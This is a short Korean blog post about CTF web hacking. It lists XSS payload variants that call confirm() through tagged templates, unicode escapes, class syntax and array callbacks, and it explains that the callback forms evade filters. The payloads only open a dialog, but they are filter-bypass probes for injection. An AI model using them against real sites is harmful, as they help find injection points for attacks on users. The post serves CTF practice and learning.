XSS awesome confirm variants
2019. 4. 17. 15:10
CTF에서 XSS exploiting 문제가 나오면 유용하게 사용할 수 있는 페이로드들.
confirm()
confirm``
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)아래의 Array 기반으로 함수를 실행하는 방식은 Javascript의 callback 함수를 이용하여 confirm() 함수를 실행시킨 것이다.
'Hacking > Web.' 카테고리의 다른 글
| CTF 웹해킹 문제 풀 때 루틴 (0) | 2019.11.16 |
|---|---|
| Bypassing with special chars in XSS exploit (0) | 2019.04.19 |
| Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities (0) | 2019.03.28 |
| python django ssti cheat sheet (0) | 2018.08.15 |
| XSS on HTTPonly (0) | 2018.08.10 |